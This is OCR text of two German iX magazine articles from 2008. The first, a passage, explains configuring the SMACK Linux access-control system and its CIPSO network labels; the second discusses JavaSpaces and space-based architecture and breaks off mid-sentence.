die SMACK-Label anzeigt. 
Der angepasste SSH-Daemon 
ist in der Lage, einem Benut- 
zer bei der Anmeldung ein be- 
stimmtes Label zuzuweisen. 


Mit klassischer 
Zugriffsgrammatik 


Wie alle anderen MAC-Sys- 
teme unterscheidet SMACK 
drei Parameter: Subjekt, Ob- 
jekt und Zugriff. Ein Subjekt 
ist die agierende Instanz, bei- 
spielsweise ein Prozess, Zu- 
griffe erfolgen auf das Ob- 
jekt. Dies kann eine Datei oder 
ein Prozess sein. Letzteres ist 
beispielsweise der Fall, wenn 
ein Prozess einem anderen ein 
Signal sendet oder Daten aus- 
tauscht. SMACK kennt vier 
Zugriffe: Read, Write, Exe- 
cute und Append. 

Am verständlichsten ist 
der Einsatz von SMACK an 
einem kleinen Beispiel. Ziel 
dieses Szenarios ist die Dif- 
ferenzierung der Benutzer. 
Casey Schaufler hat zu die- 
sem Zweck den OpenSSH- 
Server modifiziert. Der Patch 
steht auf seiner Homepage 
gemeinsam mit anderen Pat- 
ches zur Verfügung (siehe 
„Onlinequellen“, [a]). Dieser 
erweiterte OpenSSH-Server ist 
in der Lage, Benutzern ein La- 
bel zuzuordnen, anhand des- 
sen SMACK die Berechti- 
gungen prüft. Innerhalb eines 
Labels erlaubt SMACK Zu- 
griffe grundsätzlich. Hat ein 
Prozess das Label „ralf“, darf 
dieser grundsätzlich auf alle 
Objekte mit dem Label „ralf“ 
zugreifen. Zusätzlich verwen- 
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det SMACK vier interne La- 
bels: _ (floor) X (hat) * (star) 
sowie ? (huh) 


Auf das Label 


kommt es an 


Standardmäßig erhalten fast 
alle Subjekte und Objekte ei- 
nes Systems das Label floor. 
Einzelnen Benutzern kann der 
oben erwähnte OpenSSH-Ser- 
ver ein eigenes Label zuwei- 
sen. Die Entscheidung über 
einen Zugriff erfolgt in dieser 
Reihenfolge: 
1. Jeder Zugriff durch ein 
Subjekt mit dem Label „*“ 
(star) ist verboten. 
2. Jeder lesende (r) und aus- 
führende (x) Zugriff eines 
Subjektes mit dem Label „X“ 
(hat) ist erlaubt. 
3. Jeder lesende oder ausfüh- 
rende Zugriff auf Objekte mit 
dem Label „_“ (floor) ist er- 
laubt. 
4. Jeder Zugriff auf ein Objekt 
mit dem Label „*“ (star) ist 
erlaubt. 
5. Jeder Zugriff durch ein 
Subjekt auf ein Objekt mit 
identischem Label ist erlaubt. 
Das heißt, ein Subjekt mit La- 
bel ralf darf auf Objekte mit 
Label ralf zugreifen. 
6. Jeder explizit im Regel- 
werk (siehe Text) gestattete 
Zugriff ist erlaubt. 
7. Jeder Zugriff, der über die 
in den Punkten 2 bis 6 gebil- 
listen Fälle hinausgeht, ist 
verboten. 

Aus diesen Regeln folgt 
zunächst, dass SMACK ohne 


den Einsatz eines angepass- 
ten OpenSSH-Servers keine 
Auswirkung auf das System 
hat. In dem Fall erhalten alle 
Benutzer das Default-Label 
„_ (floor). Dadurch dürfen 
sie auf alle Objekte beliebig 
zugreifen, da der Zugriff auf 
Objekte mit identischem La- 
bel erlaubt ist. 

Kommt nun der modifi- 
zierte OpenSSH-Server zum 
Einsatz, kann der Systemver- 
walter einzelnen Benutzern in 
/etc/smack/user ein maximal 
23 Zeichen langes Label zu- 
weisen. 


/etc/smack/user: 
#user label 

ralf ralf 

student student 


Damit der Benutzer ralf bei 
der Anmeldung auf die Da- 
teien in seinem Heimatver- 
zeichnis zugreifen darf, sollte 
man diese nun ebenfalls mit 
einem passenden Label verse- 
hen. Hierzu ist bei den Da- 
teien das Security-Attribut 
„SMACK64“ zu setzen. Wich- 
tig bei diesem Befehl (siehe 
Listing 1) ist die Verwendung 
der Option „-$“, die das Secu- 
rity-Attribut setzt. 
Anschließend zeigt der 
ebenfalls von Casey Schau- 
fler modifizierte /s-Befehl, 
mit der Option -M aufgeru- 
fen, diese Angaben in der 
ersten Spalte an (siehe Lis- 
ting 2). Meldet sich nun der 
Benutzer ralf per SSH an, 
bietet sich ihm das in Lis- 
ting 3 gezeigte Bild: Er erhält 
keinen Zugriff auf das Ver- 


Control). 


bestimmt sind. 


nicht verändern können. 


A-TRACT 


@ Moderne Betriebssysteme überlassen dem Benutzer die 
Rechtevergabe seiner Dateien (Discretionary Access 


@ Durch Fehler in der Konfiguration oder Programmierung 
kann ein Angreifer auf Daten zugreifen, die nicht für ihn 


© Ein Mandatory-Access-Control-System löst dieses Problem, 
indem es verpflichtende Zugriffsregeln definiert, die Benutzer 


e SELinux ist kompliziert in der Anwendung; SMACK verfügt 
jedoch über eine einfache Konfiguration. 
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Profile. Default 


Wireshark unterstützt die Fehlersuche bei den CIPSO-Labels 


(Abb. 1). 


zeichnis /home/student. Das 
eigene Label können Benut- 
zer via /proc-Verzeichnis aus- 
lesen, der Aufruf cat /proc/ 
selflattr/current liefert als Er- 
gebnis ralf zurück. 


Sinnvolle Default- 
Einstellungen 


Dass der Benutzer dennoch 
auf dem System arbeiten 
kann, liegt am Standard-Label 
„_, das alle ungelabelten Da- 
teien erhalten. Objekte mit 
diesem Label darf der Benut- 
zer lesen und ausführen. Das 
Default-Label kann der Ad- 
ministrator beim Mounten 
mit der Option smackfsdef=... 
definieren. 

Alle weiteren Prozesse, 
die der Benutzer ralf aufruft, 
erben sein Label. Auch wenn 
er das Kennwort des Benut- 
zers student kennt und die 
Kennung per su wechselt, 
kann er dessen Verzeichnis 
nicht lesen (siehe Listing 4). 
Ausgenommen sind hier ak- 
tuell noch die privilegierten 
Prozesse. Da root über die 
Capability CAP_MAC_OVER 


RIDE verfügt, kann er sich 
über diese Einschränkungen 
hinwegsetzen. 

Natürlich können zusätzli- 
che Regeln den Zugriff den- 
noch erlauben. Diese fügt der 
Administrator in /etc/smack/ 
accesses ein. Damit das Label 
ralf auf das Label student zu- 
greifen darf, genügt folgender 
Eintrag: 


ralf student rwx 


Das von Casey Schaufler zur 
Verfügung gestellte Init-Skript 
lädt /etc/smack/access eben- 
falls automatisch. Der Admi- 
nistrator kann die Regeln 
aber auch zur Laufzeit mit 
dem Befehl smackload akti- 
vieren. Anschließend lassen 
sie sich per cat /smack/load 
auslesen. 

Mit diesen Regeln darf 
nun der Benutzer ralf aus der 
Sicht von SMACK beliebige 
Zugriffe auf die Dateien mit 
dem Label student ausführen. 
Natürlich müssen auch die 
Linux-DAC-Rechte den Zu- 
griff erlauben. SMACK kann 
keine Privilege Escalation 
durchführen. Rechte, die ein 
Prozess ohne SMACK nicht 
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Zugriffskontrolle 


besitzt, kann er durch dessen 
Einsatz nicht erhalten. Via 
SMACK lassen sich die klas- 
sischen Benutzerrechte nur 
weiter einschränken. Es unter- 
scheidet sich in dieser Bezie- 
hung nicht von SELinux oder 
AppArmor. 

Leider existiert mit dem 
von Schaufler modifizierten 
OpenSSH-Server bisher erst 
eine einzige Applikation, die 
in der Lage ist, einem Pro- 
zess ein abweichendes Label 
zuzuweisen. Wünschenswert 
istein PAM-Modul, das dies 
allgemein für jede Form der 
Anmeldung realisieren könn- 
te. Dann wären auch lokale 
Anmeldungen besser ge- 
schützt. Zusätzlich sollte man 
den Benutzerprozessen die 
Capability CAP_MAC_OVER- 
RIDE entziehen. Dies geht bei 
den aktuellen Kernels aber 
nicht mehr grundsätzlich, son- 
dern nur noch für jeden Pro- 
zess einzeln. Auch hierzu 
existiert ein PAM-Modul (pam 
_cap). Es ist Bestandteil der 
libcap-Bibliothek ab der Ver- 
sion 2.09 und erledigt die 
Aufgabe dann für alle Appli- 
kationen, die der Benutzer an- 
schließend startet. 

SMACK wirkt sich aber 
auch auf die Netzwerk-Kom- 


munikation des betroffenen 
Systems aus. Alle Pakete, die 
das System versendet, lassen 
sich nun nach der CIPSO- 
Spezifikation (Common-IP- 
Security-Option) mit Labels 
versehen. Linux selbst unter- 
stützt CIPSO ab der Kernel- 
Version 2.6.19 durch das 
Netlabel-Projekt [2]. 


Mit CIPSO mehr 


Netzsicherheit 


CIPSO 2.2 war ein IETF- 
Draft, der zwar schon im Jahre 
1993 abgelaufen ist, aber den- 
noch in mehrere Sicherheits- 
produkte Einzug gehalten hat. 
Ursprünglich als Commercial- 
IP-Security-Option gestartet, 
einigen sich bei CIPSO die 
beteiligten Systeme auf eine 
Domain-of-Interpretion (DOD 
und die hier gültigen Labels 
oder Tags. Die Kernel der be- 
teiligten Betriebssysteme stel- 
len dann sicher, dass nur er- 
laubte Prozesse die Pakete mit 
dem entsprechenden Label 
empfangen und versenden 
dürfen. Wenn ein Linux-Sys- 
tem in derartigen Umgebun- 
gen mit anderen Systemen wie 
Trusted Solaris Kommunizie- 
ren soll, muss es die CIPSO- 


Listing 1: Dateiattribute für SMACK setzen 


find /home/ralf -exec attr -$ -s SMACKb4 -\ "ralf" (} \; 
find /home/student -exec attr -$ -s SMACK64 -V "student" {} \; 


total 16 
ralf  drwr-xr-x 2 ralf  ralf 


Listing 2: Ausgabe von Is -IM /home {I} 


4096 Jun 1 15:36 ralf 
student drwxr-xr-x 2 student student 4096 Mar 9 16:33 student 


total 8 


aemmmıı 


Listing 3: Ausgabe von Is -IM /home {Il} 
Is: cannot access /home/student: Permission denied 


ralf druxr-xr-x 2 ralf ralf 4096 Jun 1 15:36 ralf 
? ? student 


$ su - student 

Password: 

No directory, logging in with HONE=/ 
studentadebian:/$ id 
wid=1000(student) gid=1000(student) 
studentadebian:/$ Is -IM /hone 


total 8 


Listing 4: Keine Label-Änderung via su 


Is: cannot access /home/student: Keine Berechtigung 


[a] OpenSSH-Patch 


www.schaufler-ca.com/data/071121/smack-util-0.1.tar 


[b] Casey Schauflers Homepage 
www.schaufler-ca.com 


Label setzen und auswerten 
können. 

Um einem Prozess einen 
bestimmten CIPSO-Tag zuzu- 
weisen, ergänzt der Adminis- 
trator die erforderlichen Infor- 
mationen in der Datei /etc/ 
smack/cipso: 


ra 5678 


Auch diese Informationen 
lädt das Init-Skript beim 
Booten automatisch. Sie las- 
sen sich vom Administrator 
mit dem Befehl smackcipso 
zur Laufzeit ändern. Hierbei 
sind die erste Zahl die CIP- 
SO-Sensitivität und die wei- 
teren Zahlen die Kategorien. 
Über /smack/doi lässt sich 
auch die DOI direkt. Wie im 
Screenshot in Abbildung 1 zu 
sehen, interpretiert Wireshark 
diese Werte. 

Wie die Empfänger der Pa- 
kete auf die Label reagieren, 
hängt stark von deren Be- 
triebssystem ab. SELinux-fähi- 
ge Systeme können die Label 
auswerten; unwissende Syste- 
me reagieren jedoch meist mit 
einer eher irreführenden Feh- 
lermeldung „ICMP-Parame- 
ter-Problem“. 

Auch wenn CIPSO sicher- 
lich für die meisten Netze un- 
interessant oder gar unbrauch- 
bar ist, kann mit SMACK 
jeder ein wenig hineinschnüf- 
feln und diese Technik sehr 
einfach testen. Mit SELinux, 
das ebenfalls CIPSO-Netlabel 
unterstützt, ist das wesentlich 
aufwendiger. 


Fazit 


Allgemein ist SMACK inter- 
essant, wenn eine einfache 
Differenzierung der Benutzer 


keit, einem Prozess ein vom 
Default abweichendes Label 
zuzuweisen. 

Damit ist das System zwar 
sehr einfach einzurichten, bie- 
tet aber im derzeitigen Ent- 
wicklungsstand wenig Flexi- 
bilität. Die Überwachung und 
Trennung einzelner Dienste 
funktioniert (noch) nicht. Dies 
erfordert ein modifiziertes 
SysV-Init nebst passendem 
PAM-Modul. Da SMACK 
aber seit der Version 2.6.25 
fester Bestandteil des Stan- 
dard-Linux-Kernels ist, be- 
steht die Hoffnung, dass die 
Community diese fehlenden 
Funktionen schnell nachlie- 
fert. Leider fehlt SMACK 
auch eine Anbindung an das 
Audit-System im Kernel. So 
erfolgt bisher keinerlei Proto- 
kollierung der Vorgänge. Eine 
Fehlersuche gestaltet sich da- 
her schwierig. Erfreulicher- 
weise ist SMACK jedoch so 
einfach, dass sich Fehler meist 
von selbst erklären. (avr) 
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ralf drunr-xr-x 2 ralf ralf 4096 2008-06-01 15:36 ralf gewünscht wird und diese 

man 2 ! ? student f :_ 
studentadebian:/$ cat /proc/self/attr/current sich per SSH anmelden. Lei 
ralf der verfügt SMACK bisher 


über keine andere Möglich- 
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Java-Programmierung 


Bessere Software mit Spaces 


Ohne Raum und Zeit 


Bernhard Angerer 


Obwohl seit Jahren bekannt, sind Spaces noch immer eine 
Nischentechnik. Die Spaces-Community hingegen spricht von einem 
zukunftsweisenden und nachhaltigen Ansatz. Diese Meinung teilt die 
Grid-Gemeinde, die das Konzept in einigen Projekten nutzbringend 


umsetzt. 


er Zeitreisende, von dem 
DD‘. Stal in seinem 

Artikel „Aus der Zu- 
kunft“ [1] 2006 berichtete, wä- 
re sicherlich enttäuscht, dass 
sich in der aus seiner Sicht 
„prähistorischen Informatik“ 
auch gute zweieinhalb Jahre 
später nicht viel geändert hat. 
Noch immer schätzen Markt- 
analysten und IT-Experten, 
dass nur 20 Prozent aller Soft- 
wareprojekte zu einem erfolg- 
reichen Abschluss kommen. 
Die restlichen 80 Prozent erlei- 
den im schlimmsten Fall einen 
vorzeitigen Abbruch, der Nor- 
malfall sind Projekte mit Zeit- 
und Budgetüberschreitung 
oder unvollständigem Auslie- 
ferungsvolumen. Die Frage 
lautet daher nach wie vor: Wie 
lässt sich bessere Software 
effizient herstellen? 


118 


Eine Antwort liefert die 
Spaces-Community, die zur 
Verbesserung der Gesamtlage 
einen Ansatz vorschlägt, den 
man als holistisch bezeichnen 
kann, da er infrastrukturseitige 
Herausforderungen mit einem 
anwendungsseitigen Program- 
mierparadigma vereint. David 
Gelernter gilt als der Erfinder 
von Spaces, seitdem er Ende 
der 80er-Jahre zusammen mit 
Nicholas Carriero in einem 
System namens Linda die 
Grundlagen gelegt hat. Die 
Signifikanz und zukunftswei- 
sende Bedeutung dieses Ansat- 
zes hat man schon damals er- 
kannt, erst die letzten Jahre 
brachten jedoch Implementie- 
rungen in Produktionssyste- 
men größeren Ausmaßes. 

Die Definition von Spaces 
ist nicht einfach, da sich keine 


bekannte Schublade dafür öff- 
nen lässt. Laut Josef Ottinger 
(siehe „Onlinequellen“ [b]) 
verbirgt sich dahinter eine Art 
Speicherabbild von Client/Ser- 
ver-Anwendungen, ein Netz 
(Grid), in dem Daten existie- 
ren, die gelesen und geschrie- 
ben werden können. Als Infra- 
struktur dient den JavaSpaces 
ein „Distributed Virtual Shared 
Memory“ zur Kommunikation 
und Koordination zwischen 
unterschiedlichen Programmen. 


Entkopplung in 
drei Freiheitsgraden 


Anders als bei gewöhnlichem 
Shared Memory kommt in die- 
sem Fall Verteilung hinzu. 
Auf den ersten (und zweiten 
Blick) zu trivial, um dem viel 


Aufmerksamkeit zu widmen 
(die Genialität liegt eben oft in 
der Einfachheit). Bei genaue- 
rem Hinsehen ergeben sich je- 
doch weitgehend neue Muster 
auf der Anwendungs- sowie 
auf der Infrastrukturseite. 

Zeitreisende müssen mit 
Raum-, Zeit- und Referenzent- 
kopplung zurechtkommen — so 
auch manche Programme. Ei- 
ne anwendungsseitige „Black- 
board“-Kommunikation er- 
möglicht das, indem sie ihnen 
erlaubt, Daten einfach in „den 
Space“ zu schreiben. Andere 
Programme, die Interesse an 
diesen Daten angemeldet ha- 
ben, erhalten eine Benachrich- 
tigung und können aus dem 
Space beliebig lesen (black- 
board metaphore). Das bedeu- 
tet, dass jegliche Interaktion in 
einem Space-basierten System 
triadisch abläuft, wodurch sich 
ein neues Paradigma ergibt. 
Peers kommunizieren mitein- 
ander 
—-ohne etwas voneinander zu 
wissen (Referenzentkopplung), 
-ohne sich am selben Ort 
(Maschine) befinden zu müs- 
sen (Raumentkopplung) und 
— ohne zeitliche Abstimmung 
(Zeitentkopplung). 

Diese Entkopplung in allen 
drei Freiheitsgraden ist ein 
Idealzustand aus der Sicht 
von Komponentendesignern 
(weitere Online-Informatio- 
nen zu in diesem Artikel an- 
gesprochenen Themen sind 
über die iX-Links erreichbar). 
Je geringer die Verflechtun- 
gen und starren Abhängigkei- 
ten, desto besser in Bezug auf 
den Aufwand für Entwicklung 
und Debugging sowie den 
Grad der Wiederverwendung. 
Ein noch entscheidenderer 
Punkt ist jedoch die implizit 
stattfindende Koordination. 

Ein Programm fordert In- 
formationen an, indem es ein 
Requestobjekt in den Space 
stellt. An anderer Stelle er- 
zeugt dieser Vorgang eine 
Nachricht, und nachdem das 
Programm entsprechende Ak- 
tionen vorgenommen hat, stellt 
es die Antworten wiederum in 
den Space. Steht ein benötigtes 
Resultat in Form eines Space- 
Eintrags noch nicht zur Verfü- 


iX 8/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


Listing 1: Spaces-basierte API 


Entry read(Entry tmpl, Transaction txn, Long timeout) 
Entry write(Entry entry, Transaction txn, Long Lease) 
Entry take(Entry tmpl, Transaction txn, Long timeout) 
EventRegistration notify(Entry tmpl, Transaction txn, RemoteEventListener Listener, long lease, Marshalledübject handback) 


Die JavaSpaces-Spezifikation selbst gibt ein Beispiel für eine Spaces-basierte API. 


gung, wartet der zuständige 
Agent auf dessen Eintreffen. 
Der Entwickler bleibt von ty- 
pischen Workflow-Problemen 
(bestimmte Aufgaben müs- 
sen vor anderen erledigt wer- 
den) verschont. Die Kommu- 
nikation und Koordination löst 
sich geradezu auf und be- 
schränkt sich auf Schreib- und 
Leseoperation in den und aus 
dem Space. Des Weiteren ist 
es vollkommen gleichgültig, 
ob ein Agent oder Hunderte 
auf das Eintreffen von Nach- 
richten warten. Die Komple- 
xität für den Entwickler steigt 
nicht in Abhängigkeit von der 
Teilnehmeranzahl. 


Einfachheit hat 
hohen Stellenwert 


Beim Entwurf der Spaces-API 
setzten die Entwickler auf ra- 
dikale Einfachheit und Ver- 
ständlichkeit. Im Wesentlichen 
besteht sie aus vier Methoden 
(siehe Listing) zum Schrei- 
ben, Lesen, Lesen und gleich- 
zeitigen Löschen (Take) so- 
wie einem Event-Handler, den 
das Eintreffen von Objekten 
(Entries) anstößt. Die folgen- 
den drei Techniken bestim- 
men das Space-basierte Pro- 
grammierparadigma: 

— Template Matching: Einer 
Read-Operation wird eine 


Vorlage (eine Instanz eines 
Objekts) übergeben. Objekt- 
attribute, die nicht initialisiert 
sind, fungieren als Wildcards, 
konkrete Attributwerte schrän- 
ken ein und bestimmen so das 
zurückgelieferte Ergebnis. Auf 
diese Weise lässt sich einfach 
und flexibel in einem Objekt- 
graphen navigieren. 
— Leases: Eine Leasetime 
spezifiziert eine Ablaufzeit 
und begrenzt so den Lebens- 
zyklus eines Objekts im Space. 
Die Verantwortung, Objekte 
zwecks Schonung der Res- 
sourcen aus dem Space zu lö- 
schen, lässt sich so an die Space 
Engine delegieren (Leases ist 
ein Jini-Mechanismus; alter- 
nativ ist eine Garbage Collec- 
tion denkbar). 
— Timeouts: Im Prinzip sind 
Timeouts nichts Neues, sollen 
hier aber nicht unerwähnt blei- 
ben, da sie für die Workflow- 
Eigenschaften der Spaces-API 
maßgeblich sind. Ein Kommu- 
nikationsteilnehmer kann so 
dazu gebracht werden, auf das 
Eintreffen eines gewissen Er- 
eignisses (eines Objekts) zu 
warten. Warten viele Teilneh- 
mer auf von einem einzelnen 
Teilnehmer erzeugte Ereig- 
nisse, spricht man von dem 
Master/Worker Pattern. 

Im Vergleich zu traditio- 
nellen Methoden kann man 
Folgendes zusammenfassen: 


virtuellen Speicher. 


haltung bieten. 


A-TRACT 


© JavaSpaces - ein Forschungsprojekt der Sun Labs - 
sollen durch ihre Architektur die Komplexität verteilter 
Anwendungen deutlich reduzieren. 


© Die Kommunikation und Koordination zwischen verschie- 
denen Programmen läuft über Agenten in einem verteilten 


© Spaces-basierte Anwendungen findet man heute vornehm- 
lich im Grid-Umfeld, da sie gegenüber herkömmlichen 
Clustering-Ansätzen deutliche Vorteile bezüglich der Daten- 
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— Write + Take: entspricht 
Parallel Processing (Remote 
Procedure Call, RPC) 
— Write + Read: entspricht 
Caching (Put, Get) 
— Write + Notify: entspricht 
Messaging (Publish, Sub- 
scribe) Distributed Virtual 
Shared Memory 

Zwei Schlagworte — In-Me- 
mory und Replication — spie- 
len eine entscheidende Rolle 
dabei, wie die Space-Engine 
die Illusion eines verteilten, 
gemeinsam benutzten Ge- 
dächtnisses erzeugt. 


An mehreren 
Orten zugleich 


Ein Zeitreisender würde in ei- 
nem Space-basierten Univer- 
sum logisch nur einmal exis- 
tieren, physikalisch jedoch an 
mehreren Orten. Der Space 
sorgt dafür, dass die Anwen- 
dung jedes Objekt als singulär 
erkennt, physikalisch gesehen 
speichert sie die Objekte je- 
doch auf mehreren Rechnern. 
Klingt einfach, ist in der Praxis 
jedoch schwierig, da eine An- 
wendung mit Ressourcen spar- 
sam umgehen muss und da- 
her nicht alle Objekte an alle 
Teilnehmer (Nodes) verteilen 
kann. Die Replikationsproto- 
kolle müssen daher „intelli- 
gent“ sein und Objekte in 
Abhängigkeit von deren Ver- 
wendung propagieren oder par- 
titionieren. Das heißt, ein Ob- 
jekt wird nur für einen Node 
oder eine Anwendung repli- 
ziert, wenn diese dessen Da- 
ten tatsächlich konsumieren. 
Daraus ergibt sich ein ent- 
scheidender Unterschied zu 
traditionellen Clustering-An- 
sätzen, die meist versuchen, 
eine Virtualisierung von Res- 
sourcen auf transparente Art 
und Weise zu erreichen. Ein 
Space-Cluster ist hingegen 
„Application aware“. Die 


Kehrseite der Medaille ist na- 
turgemäß der Aufwand für ein 
Redesign, der anfällt, wenn 
man ein bestehendes System 
umstellt (weshalb man in der 
Praxis fast ausschließlich neue 
Module Space-basiert entwi- 
ckelt und Bestehendes nur 
zum Teil transformiert). 

Skeptiker wenden üblicher- 
weise ein, dass ein Space-Sys- 
tem nicht skaliert, wenn viele 
Rechner eingebunden sind 
und viele Teilnehmer ein und 
dasselbe Objekt gleichzeitig 
verändern (Locking-Mecha- 
nismen sind ja bekanntlich 
teuer). Eine Lösung hierfür 
ist, nicht auf pessimistische 
Art einen Lock einzuführen, 
sondern mit Optimismus ei- 
nen internen Versionszähler 
mitzuführen (pessimistic/op- 
timistic locking). Kommt es 
zu einem Konflikt, erhält der 
Client eine Information über 
die fehlgeschlagene Write- 
Operation. 

Intern arbeitet die Space 
Engine mit schon aus der Da- 
tenbankwelt bekannten Pri- 
mary-Copy-Verfahren. Dabei 
muss sie nur ein Objekt bei 
einer schreibenden Operation 
verändern (die Primary Copy). 
Alle anderen Replikate aktua- 
lisiert sie anschließend asyn- 
chron, das heißt, erst nach dem 
Ende der Transaktion. Damit 
bleibt die Zeit, in der der 
schreibende Client blockiert 
ist, minimal (mit dem Kom- 
promiss, dass sich die Anpas- 
sung der Replikate verzögert). 


Die Suche 
nach dem Gral 


Dies vermeidet auf effiziente 
Art einen Flaschenhals, da 
die Speicherung der Primär- 
kopien unterschiedlicher Ob- 
jekte an verschiedenen Kno- 
ten erfolgt. Somit entsteht ein 
„virtueller Server“, der keine 
zentrale Steuerung besitzt 
(peer to peer virtualization). 
Darüber hinaus wird im An- 
wendungsdesign mit mehre- 
ren logischen Spaces (daher 
der Plural im Namen) gear- 
beitet, was zu einer zusätz- 
lichen Segmentierung führt 
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Java-Programmierung 


und die effiziente Abwicklung 
verteilter Transaktionen be- 
günstigt. 

Effiziente Transaktionspro- 
tokolle sind bis heute ein For- 
schungsthema, verbirgt sich 
doch nach allgemeiner Mei- 
nung ein heiliger Gral der 
Softwareentwicklung hinter 
dem Thema. Jedoch hält vie- 
lerorts Pragmatismus Einzug 
in diesbezügliche Initiativen, 
nachdem man in den vergan- 
genen Jahrzehnten viel über 
Abstraktionsniveaus gelernt 
hat. Joel Spolsky hat den Be- 
griff der „Leaky Abstraction“ 
[h] in seinem „Law of Leaky 
Abstractions“ auf anschau- 
liche Weise geprägt. Demge- 
mäß lautet dessen Leitsatz: 
„All non-trivial abstractions, to 
some degree, are leaky.“ 

Demzufolge sind sich Ent- 
wickler des Trade-off-Spiels 
(meist Performance gegen 
Funktionsvielfalt/Komfort) be- 
wusst und gehen willentlich 
einen Kompromiss ein, indem 
sie die Problematik explizit im 
System berücksichtigen und 
nicht versuchen, mit allen Mit- 
teln (fauler Kompromiss) zu 
abstrahieren. In Bezug auf das 
oben angeschnittene Thema 
des „Concurrent Write Resolu- 
tion“ bedeutet das eine Verla- 
gerung in die Konfiguration. 
Der Systemdesigner infor- 
miert demnach den Space über 
unterschiedliche Anforderun- 
gen explizit und deklarativ. So 
kann er beispielsweise Objek- 
te, die unter Write-most- oder 
Read-most-Einfluss stehen, 
dahingehend auszeichnen. Un- 
terschiedliche Implementierun- 
gen der Engine liefern dann 
optimale Ergebnisse. 

Um transaktionale Sicher- 
heit zu erreichen, erfolgt die 
Speicherung nicht auf der 
Festplatte oder in der Daten- 
bank, sondern die Daten wer- 
den speicherresident auf ande- 
re Nodes repliziert. Bei einem 
Ausfall weiß die Space Engine 
um die redundanten Daten in 
anderen Hauptspeichern und 
kann die Gesamtkonsistenz 
wahren (in-memory fail-over). 

Entscheidend ist, dass man 
so mehrere Fliegen mit einer 
Klappe schlägt, da man ja 
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durch das verteilte Anwen- 
dungsszenario die Daten so- 
wieso an verschiedenen Orten 
zur Verfügung stellen muss 
(was auch auf Performance- 
und Verfügbarkeitsskalierung 
zutrifft). Die Kommunikation 
mit der Datenbank ist in ei- 
nem Space-System üblicher- 
weise asynchron. So über- 
rascht es nicht, dass man mit 
diesem Ansatz in völlig neue 
Performance-Kategorien vor- 
stößt und Gartner das Akro- 
nym XTP (Extreme Transac- 
tion Processing) für derartige 
Systeme prägte. 


Weniger 
Komplexität 


Singularitäten sind wohl der 
Stoff, aus dem Zeitreisen ge- 
macht sind. Betrachtet man die 
eben beschriebene dreidimen- 
sionale, anwendungsseitige 
Entkopplung im Zusammen- 
spiel mit der infrastruktur- 
seitigen Fusion von Kom- 
munikation und Replikation, 
ergibt sich das holistische Bild 
einer Space-basierten Architek- 
tur, deren Ansatz sich durch ei- 
ne Besonderheit auszeichnet: 
Üblicherweise wird eine hö- 
here Abstraktionsebene aus- 
schließlich durch eine Soft- 
wareschicht erreicht, die alle 
Problemstellungen dieser Ebe- 
ne löst. Kein neuer Ansatz 


reduziert die existierende Kom- 
plexität, sondern es wird ledig- 
lich der Ort der Implementie- 
rung verschoben. 

Bei einer Space-basierten 
Architektur jedoch kommt ei- 
ne tatsächliche Komplexitäts- 
reduktion hinzu. Durch die 
Zusammenlegung des Kom- 
munikations-, Koordinations- 
und Replikationsmechanismus 
kann man geradezu von einer 
„technischen Singularität“ 
(Problemraumfaltung) spre- 
chen. Ein und dieselbe Infra- 
struktur erlaubt Parallelverar- 
beitung, Nebenläufigkeit auf 
Einprozessor-Rechnern sowie 
netzweite Kommunikation. 
Die folgenden Eigenschaften 
sind in einem Space-basierten 
System inhärent gegeben, grei- 
fen gegenseitig ineinander und 
definieren ein völlig neues De- 
signparadigma für den Anwen- 
dungsprogrammierer: 

- Stateful Programming: 
Klassische verteilte Systeme 
gehorchen dem Stateless Pro- 
gramming. Eine Anwendung 
arbeitet jede Anfrage unab- 
hängig von der vorhergehen- 
den ab. Es gibt kein „Gedächt- 
nis“ (distributed shared state/ 
memory). Der Space hebt die- 
sen Umstand auf und erzeugt 
die Illusion einer einzelnen 
(virtuellen) Maschine. 

— Deferred Execution: Ein 
Space-basiertes System verar- 
beitet alle Aufrufe asynchron. 


Dadurch eröffnen sich völlig 
neue Möglichkeiten in der 
zeitlichen Abwicklung und 
Priorisierung von Aufgaben. 
Dinge lassen sich delegieren 
und entkoppeln. Somit ist es 
ein Leichtes, die Antwortzei- 
ten für eine initiale Antwort 
gering zu halten und gleich- 
zeitig parallel im Hintergrund 
an zusätzlichen Aufgaben zu 
arbeiten (beispielsweise beim 
Einsatz von Ajax). 

— Agent Based: In der Regel 
sind Agents feingranulare 
Komponenten, die ihren ei- 
genen Lebenszyklus besitzen 
und bestimmte Aufgaben er- 
ledigen. Durch die asynchro- 
ne, entkoppelte Architektur 
„mutiert“ in einem Space-ba- 
sierten System jede Kompo- 
nente zu einem Agenten. So- 
mit kann die Anwendung 
flexibel „zusammengestellt“ 
werden (service orchestra- 
tion) und Komponenten las- 
sen sich voneinander losge- 
koppelt testen. 

- Monitoring: Die nachrich- 
tenbasierte Kommunikation 
und Koordination in einem 
Space-System geben dem 
Entwickler auf Anwendungs- 
ebene Einsicht in den aktuel- 
len Ablauf, ohne die Gesamt- 
Performance nachhaltig zu 
beeinflussen. Monitoring und 
Controlling auf Anwendungs- 
ebene erledigt ein zusätzlicher 
Agent. 
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- Scaling: Alle Aspekte der 
Skalierung und Verteilung 
werden aus dem Anwendungs- 
code entfernt und in die Kon- 
figuration des Space verscho- 
ben. Dies beinhaltet sowohl 
Performance- als auch Ver- 
fügbarkeitsskalierung. Multi- 
Core-Systeme (von aktueller 
Middleware oft nur durch 
explizite Multi-Threaded-Pro- 
grammierung unterstützt) wer- 
den in idealer Weise ausgenutzt, 
da alle Agenten vollkommen 
asynchron laufen und somit 
ihre Ausführung parallel er- 
folgen kann. 

—Reality Check: Unternimmt 
der Zeitreisende einen Reality 
Check im Jahr 2008, stößt er 
auf erste Space-basierte Syste- 
me, die in nennenswerten Grö- 
ßenordnungen in Produktion 
sind [b]. In den meisten Fällen 
handelt es sich um Anwendun- 
gen, deren Komplexität die 
Möglichkeiten der etablierten 
Anwendungsserver signifikant 
übersteigt, arbeiten jene doch 
mit getrenntem Clustering für 
die Anwendungs-, Daten- und 
Nachrichtenschicht sowie se- 
paraten Modulen für paralleles 
Rechnen. 

So mancher sieht die Zeit 
der Spaces bereits kommen. 
Allerdings zeigt der Reality 
Check eindeutig, dass sich das 
Thema ausschließlich im Um- 
feld des Grid Computing be- 
wegt. Keine Rede von einer 
breiteren Diskussion (abgese- 
hen vom universitären Um- 
feld), die Spaces als funda- 
mentalen Ansatz erkennt und 
ihn in Bezug auf die Heraus- 
forderungen des Software 
